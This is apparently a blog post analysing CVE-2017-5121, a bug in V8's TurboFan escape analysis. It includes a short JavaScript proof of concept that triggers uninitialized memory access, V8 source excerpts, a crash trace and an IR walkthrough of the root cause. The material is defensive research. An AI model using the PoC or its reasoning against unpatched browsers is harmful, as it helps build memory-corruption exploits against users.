CVE-2017-5121 Escape Analysis
PoC
var func0 = function(f)
{
var o =
{
a: {},
b:
{
ba: {baa: 0, bab :[]},
bb: {},
bc: {bca: {bcaa: 0, bcab: 0, bcac: this}},
}
};
o.b.bc.bca.bcab = 0;
o.b.bb.bba = Object.toString(o.b.ba.bab);
};
function g(){
while(true) func0();
}
g();
Escape Analysis in V8
- Analyze Source of Fields of Allocates: Traverse the IR graph(along Effect edge) to get the source of fields of Allocate
void EscapeAnalysis::RunObjectAnalysis() {
virtual_states_.resize(graph()->NodeCount());
ZoneDeque<Node*> queue(zone());
queue.push_back(graph()->start());
ZoneVector<Node*> danglers(zone());
while (!queue.empty()) {
Node* node = queue.back();
queue.pop_back();
status_analysis_->SetInQueue(node->id(), false);
if (Process(node)) {
for (Edge edge : node->use_edges()) {
Node* use = edge.from();
if (status_analysis_->IsNotReachable(use)) {
continue; }
if (NodeProperties::IsEffectEdge(edge)) {
// Iteration order: depth first, but delay phis.
// We need DFS do avoid some duplication of VirtualStates and
// VirtualObjects, and we want to delay phis to improve
performance.
if (use->opcode() == IrOpcode::kEffectPhi) {
if (!status_analysis_->IsInQueue(use->id())) {
status_analysis_->SetInQueue(use->id(), true);
queue.push_front(use);
}
} else if ((use->opcode() != IrOpcode::kLoadField &&
use->opcode() != IrOpcode::kLoadElement) ||
!status_analysis_->IsDanglingEffectNode(use)) {
if (!status_analysis_->IsInQueue(use->id())) {
status_analysis_->SetInQueue(use->id(), true);
queue.push_back(use);
}
} else {
danglers.push_back(use);
} }
}
// Danglers need to be processed immediately, even if they are
// on the stack. Since they do not have effect outputs,
// we don't have to track whether they are on the stack.
queue.insert(queue.end(), danglers.begin(), danglers.end());
danglers.clear();
} }
- Set Escaped for Node: Analyze the source of fields of Allocate to set escaped
void EscapeStatusAnalysis::Process(Node* node) {
switch (node->opcode()) {
case IrOpcode::kAllocate:
ProcessAllocate(node);
break;
case IrOpcode::kFinishRegion:
ProcessFinishRegion(node);
break;
case IrOpcode::kStoreField:
ProcessStoreField(node);
break;
case IrOpcode::kStoreElement:
ProcessStoreElement(node);
break;
case IrOpcode::kLoadField:
case IrOpcode::kLoadElement: {
if (Node* rep = object_analysis_->GetReplacement(node)) {
if (IsAllocation(rep) && CheckUsesForEscape(node, rep)) {
RevisitInputs(rep);
RevisitUses(rep);
}
} else {
Node* from = NodeProperties::GetValueInput(node, 0);
from = object_analysis_->ResolveReplacement(from);
if (SetEscaped(from)) {
TRACE("Setting #%d (%s) to escaped because of unresolved load #%i\n",
from->id(), from->op()->mnemonic(), node->id());
RevisitInputs(from);
RevisitUses(from);
}
}
RevisitUses(node);
break;
}
case IrOpcode::kPhi:
if (!HasEntry(node)) {
status_[node->id()] |= kTracked;
RevisitUses(node);
}
if (!IsAllocationPhi(node) && SetEscaped(node)) {
RevisitInputs(node);
RevisitUses(node);
}
CheckUsesForEscape(node);
default:
break;
}
}
- Reduce Node: Reduce nodes that are not escaped
JSGraphReducer graph_reducer(data->jsgraph(), temp_zone);
EscapeAnalysisReducer escape_reducer(&graph_reducer, data->jsgraph(),
&escape_analysis, temp_zone);
AddReducer(data, &graph_reducer, &escape_reducer);
graph_reducer.ReduceGraph();
Sea of Nodes
TF IR 被称为 Sea-of-Nodes, 可以说是一种 Program Dependence Graph, 其宗旨是"在统一的表达形式下, 把分析进行彻底" 用这样的IR所表达的程序里完全不需要"变量"的概念了, 一切都是经过透彻分析后的"值". 各种操作并不操作变量, 而是从依赖获取输入值, 运算后产生新的值. 每个值自身会携带足够依赖信息来判明它在怎样的路径上有效, 依赖的数据输入是哪些.
TurboFan 的依赖信息有三种: Control, Data, Effect
- Control Dependence 可以看作是常规控制流图反过来画. 不是基本块持有一个线性列表里面装着节点, 而是每个节点都记录着自己的控制依赖是谁 - 要哪个前驱控制节点执行到的时候我才可以执行.
- Data Dependence 很简单, 就是 use-def 链, 换句话说一个节点的数据输入都是谁.
- Effect Dependence 则记录"副作用的顺序" - 主要就是内存操作的顺序. 它只记录顺序而不必维护 SSA 形式的其它特性. 基于此, v8 放宽了 operation 的执行顺序, 由 effect edges 来管理 stateful operations 的执行顺序, 且保留了控制流图的"骨架".
阅读 TF IR 有一个很好的工具叫 turbolizer, 可以很形象的对比在每个 phase 的 IR 有什么区别, 在它产生的 graph 中, 每种颜色的边意义都不一样, 例如红色边代表 use, 绿色边代表 input. 由于 turbolizer 使用起来相当方便, 在这里就不贴图演示了.
漏洞分析
笔者分析时使用的 v8 版本号是 6.1.153. 在这个漏洞之后, v8 团队暂时关闭了 escape analysis 优化, 并且在 6.2 进行了彻底重构. 也就是说这个洞没有直接 patch.
崩溃信息
#
# Fatal error in ../../src/compiler/escape-analysis-reducer.cc, line 399
# Check failed: !escape_analysis_->IsVirtual(node).
#
==== C stack trace ===============================
0 libv8_libbase.dylib 0x00000001016f13a3 v8::base::debug::StackTrace::StackTrace() + 19
1 libv8_libplatform.dylib 0x000000010170e519 v8::platform::(anonymous namespace)::PrintStackTrace() + 41
2 libv8_libbase.dylib 0x00000001016ecc4c V8_Fatal(char const*, int, char const*, ...) + 220
3 libv8.dylib 0x00000001005b13b0 v8::internal::compiler::EscapeAnalysisReducer::Finalize() + 0
4 libv8.dylib 0x00000001006a6b22 v8::internal::compiler::EscapeAnalysisPhase::Run(v8::internal::compiler::PipelineData*, v8::internal::Zone*) + 306
5 libv8.dylib 0x000000010069c6df v8::internal::compiler::PipelineImpl::OptimizeGraph(v8::internal::compiler::Linkage*) + 1663
6 libv8.dylib 0x000000010069c030 v8::internal::compiler::PipelineCompilationJob::ExecuteJobImpl() + 32
7 libv8.dylib 0x00000001005356e3 v8::internal::CompilationJob::ExecuteJob() + 403
8 libv8.dylib 0x0000000100537ed5 v8::internal::(anonymous namespace)::GetOptimizedCode(v8::internal::Handle<v8::internal::JSFunction>, v8::internal::ConcurrencyMode, v8::internal::BailoutId, v8::internal::JavaScriptFrame*) + 2821
9 libv8.dylib 0x0000000100b48633 v8::internal::__RT_impl_Runtime_CompileForOnStackReplacement(v8::internal::Arguments, v8::internal::Isolate*) + 1027
10 ??? 0x000011a8891044c4 0x0 + 19415551722692
11 ??? 0x000011a8892242af 0x0 + 19415552901807
libv8_libbase.dylib was compiled with optimization - stepping may behave oddly; variables may not be available.
它崩溃在了一个关于是否 virtual 的检查上. 这个 virtual 大致的意义是这样的: 在开始 escape analysis 的时候, 将所有需要内存分配的 node 设置为 virtual, 如果是 escape 的, 那么就进行分配, 否则继续保持 virtual. 在分析完之后将剩下的 virtual 进行 reduce, 这样便完成了逃逸分析.
这个崩溃意味着在完成逃逸分析之后还留有 virtual 也就是未处理完的节点, 这是在理论上不应该出现的情况. 那么我们来看看有关的处理算法.
Iterative Reduction
在每个 phase 结束的时候, 都会根据当前的 graph 进行 Reduce:
void GraphReducer::ReduceGraph() { ReduceNode(graph()->end()); }
...
...
...
void GraphReducer::ReduceNode(Node* node) {
DCHECK(stack_.empty());
DCHECK(revisit_.empty());
Push(node);
for (;;) {
if (!stack_.empty()) {
// Process the node on the top of the stack, potentially pushing more or
// popping the node off the stack.
ReduceTop();
} else if (!revisit_.empty()) {
// If the stack becomes empty, revisit any nodes in the revisit queue.
Node* const node = revisit_.front();
revisit_.pop();
if (state_.Get(node) == State::kRevisit) {
// state can change while in queue.
Push(node);
}
} else {
// Run all finalizers.
for (Reducer* const reducer : reducers_) reducer->Finalize();
// Check if we have new nodes to revisit.
if (revisit_.empty()) break;
}
}
DCHECK(revisit_.empty());
DCHECK(stack_.empty());
}
...
...
...
Reduction reduction = (*i)->Reduce(node);
reduce 从代码最后的 End 节点开始进行 DFS, 先遍历子节点, 然后遍历自己, 记录 state 改变的节点, 将其放入 revisit stack, 在所有节点遍历完后, 对这些需要重新遍历的节点进行 revisit.
它的好处是能够保证在遍历父节点之前先遍历其子节点.
但环状结构在深度优先搜索中可能会访问子节点的时候先访问到父节点, 所以如果 IR 中出现循环, 便有可能存在漏掉的情况.
标量替换
在逃逸分析中对 load 操作进行标量替换的代码如下:
Reduction EscapeAnalysisReducer::ReduceLoad(Node* node) {
DCHECK(node->opcode() == IrOpcode::kLoadField ||
node->opcode() == IrOpcode::kLoadElement);
if (node->id() < static_cast<NodeId>(fully_reduced_.length())) {
// join fully_reduced_
fully_reduced_.Add(node->id()); }
// 如果 value edge 来自 virtual allocate 则进行 scalar replacement
if (escape_analysis()->IsVirtual(
SkipTypeGuards(NodeProperties::GetValueInput(node, 0)))) {
if (Node* rep = escape_analysis()->GetReplacement(node)) {
TRACE("Replaced #%d (%s) with #%d (%s)\n", node->id(),
node->op()->mnemonic(), rep->id(), rep->op()->mnemonic());
rep = MaybeGuard(jsgraph(), zone(), node, rep);
// scalar replacement
ReplaceWithValue(node, rep);
return Replace(rep);}}
return NoChange();
}
简化一下 PoC:
ba = { bab : [] }
o = { b : ba }
var0 = load { o , b }
return load { var0 , bab }
进行标量替换时, 如果我们先访问到第二次 load, 由于它的 input 也是 load, 所以不会进行任何操作, 只是将其加入 fully_reduced_, 相当于做了一个标记. 在访问第一次 load 的时候, 会直接将其 output 替换为 ba, 这时第二次 load 就被修改成了return load { ba , bab }
.
由于非逃逸的内存分配会从 effect chain 上移除, 所以此时的 ba 是未初始化的.
那么为什么执行 PoC 为什么会先访问到第二次 load 呢?
漏洞触发
这是按 DFS 排列的部分 IR:
15: EffectPhi(372, 205, 14)||
205: FinishRegion(3, 204)||
204: StoreField[tagged base, 24, #bba
, NonInternal, kRepTaggedPointer|kTypeAny, PointerWriteBarrier](198, 200, 203, 144)||
198: CheckHeapObject(187, 147, 144)||
187: LoadField[tagged base, 32, #bb
, NonInternal, kRepTaggedPointer|kTypeAny, FullWriteBarrier](184, 184, 29)||
184: LoadField[tagged base, 32, #b
, 0x1acdd2d8d831 <Map(HOLEY_ELEMENTS)>, OtherObject, kRepTaggedPointer|kTypeAny, FullWriteBarrier](295, 106, 29)||
295: FinishRegion(288, 294)||
288: Allocate[OtherObject, NotTenured](219, 287, 29)||
287: BeginRegion[not-observable](286)||
286: FinishRegion(278, 285)||
278: Allocate[OtherObject, NotTenured](230, 277, 29)||
277: BeginRegion[not-observable](29)||
29: JSStackCheck(22, 30, 26, 14)||
26: Checkpoint(30, 15, 14)||
14: Loop(412, 144)||
144: Call[Code:FunctionPrototypeToString:r1s5i9f1t0](273, 188, 197, 274, 189, 3, 275, 274, 271, 146, 271, 29)||
197: LoadField[tagged base, 32, #bab
, NonInternal, kRepTaggedPointer|kTypeAny, FullWriteBarrier](194, 194, 29)||
194: LoadField[tagged base, 24, #ba
, 0x1acdd2d8d729 <Map(HOLEY_ELEMENTS)>, OtherObject, kRepTaggedPointer|kTypeAny, FullWriteBarrier](184, 187, 29)||
197: LoadField[tagged base, 32, #bab
, NonInternal, kRepTaggedPointer|kTypeAny, FullWriteBarrier](194, 194, 29)||
144: Call[Code:FunctionPrototypeToString:r1s5i9f1t0](273, 188, 197, 274, 189, 3, 275, 274, 271, 146, 271, 29)||
271: LoadField[tagged base, 40, Internal, kRepTagged|kTypeAny, PointerWriteBarrier](189, 197, 29)||
144: Call[Code:FunctionPrototypeToString:r1s5i9f1t0](273, 188, 197, 274, 189, 3, 275, 274, 271, 146, 271, 29)||
146: FrameState[INTERPRETED_FRAME, 112, PokeAt(0), 0x1acd3f12ce89 <SharedFunctionInfo func0>](52, 145, 197, 45, 44, 157)||
145: StateValues[sparse:.^...](187)||
146: FrameState[INTERPRETED_FRAME, 112, PokeAt(0), 0x1acd3f12ce89 <SharedFunctionInfo func0>](52, 145, 197, 45, 44, 157)||
144: Call[Code:FunctionPrototypeToString:r1s5i9f1t0](273, 188, 197, 274, 189, 3, 275, 274, 271, 146, 271, 29)||
14: Loop(412, 144)||
184 必须先于 197 处理. 而 204 和 144 有依赖关系: 从 204 节点会访问到 144 节点, 于是再次通过 144 节又再次访问到 184 节点, 但此时 184 节点正在被访问, 所以先处理了 194 节点, 经过标量替换, 导致了访问未初始化内存.
所以, 非逃逸的节点(不会在函数外被使用, 却)可以在函数内被使用, 从而出现问题.
Ref
https://bugs.chromium.org/p/chromium/issues/detail?id=765433
Comments
Post a Comment